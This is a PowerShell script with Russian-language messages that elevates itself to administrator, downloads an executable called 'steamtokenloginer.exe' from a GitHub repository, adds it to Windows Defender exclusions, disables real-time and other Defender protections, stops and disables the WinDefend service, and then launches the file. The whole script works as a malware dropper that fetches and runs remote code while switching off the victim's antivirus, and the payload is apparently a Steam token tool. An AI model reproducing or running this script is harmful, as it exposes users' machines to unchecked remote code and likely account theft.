# Настройки
$exeUrl = "https://github.com/gseff137-afk/test/raw/refs/heads/main/steamtokenloginer.exe"
$targetFolder = "C:\Users\zenas\Desktop\Новая папка (7)"
$exePath = "$targetFolder\steamtokenloginer.exe"

# Проверяем права администратора
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Host "🔄 Перезапуск с правами администратора..." -ForegroundColor Yellow
    Start-Process powershell -Verb RunAs -ArgumentList "-ExecutionPolicy Bypass -Command `"$($MyInvocation.MyCommand.Definition)`""
    exit
}

Write-Host "✅ Запущено с правами администратора" -ForegroundColor Green

# Создаем папку если не существует
if (-not (Test-Path $targetFolder)) {
    New-Item -ItemType Directory -Path $targetFolder -Force
    Write-Host "📁 Создана папка: $targetFolder" -ForegroundColor Green
}

Write-Host "📥 Скачивание файла..." -ForegroundColor Yellow

try {
    # Скачиваем EXE файл
    Invoke-WebRequest -Uri $exeUrl -OutFile $exePath
    
    $fileSize = (Get-Item $exePath).Length
    Write-Host "✅ Файл скачан: $([math]::Round($fileSize/1MB,2)) MB" -ForegroundColor Green
    
    # 1. Добавляем в исключения Windows Defender НАВСЕГДА
    Write-Host "🛡️ Добавляем в исключения Windows Defender..." -ForegroundColor Yellow
    Add-MpPreference -ExclusionPath $exePath -ErrorAction SilentlyContinue
    Add-MpPreference -ExclusionPath $targetFolder -ErrorAction SilentlyContinue
    Write-Host "✅ Файл и папка добавлены в исключения НАВСЕГДА" -ForegroundColor Green
    
    # 2. ОТКЛЮЧАЕМ ЗАЩИТУ В РЕАЛЬНОМ ВРЕМЕНИ
    Write-Host "🔴 ОТКЛЮЧАЕМ ЗАЩИТУ В РЕАЛЬНОМ ВРЕМЕНИ..." -ForegroundColor Red
    
    # Отключаем все компоненты защиты
    Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
    Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue
    Set-MpPreference -DisableIOAVProtection $true -ErrorAction SilentlyContinue
    Set-MpPreference -DisableScriptScanning $true -ErrorAction SilentlyContinue
    Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction SilentlyContinue
    
    # Останавливаем службу защиты
    Stop-Service -Name "WinDefend" -Force -ErrorAction SilentlyContinue
    Set-Service -Name "WinDefend" -StartupType Disabled -ErrorAction SilentlyContinue
    
    Write-Host "✅ Защита в реальном времени ОТКЛЮЧЕНА" -ForegroundColor Green
    
    # 3. Запускаем программу
    Write-Host "🚀 Запускаем приложение..." -ForegroundColor Green
    Start-Process -FilePath $exePath
    Write-Host "🎯 Приложение запущено успешно!" -ForegroundColor Green
    
    Write-Host "`n⚠️ ВНИМАНИЕ: Защита Windows Defender отключена!" -ForegroundColor Red
    Write-Host "💡 Для включения защиты выполните:" -ForegroundColor Yellow
    Write-Host "   Set-MpPreference -DisableRealtimeMonitoring `$false" -ForegroundColor Cyan
    Write-Host "   Start-Service WinDefend" -ForegroundColor Cyan
    
}
catch {
    Write-Host "❌ Ошибка: $_" -ForegroundColor Red
}

# Ждем подтверждения
Write-Host "`nНажмите любую клавишу для выхода..." -ForegroundColor Gray
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
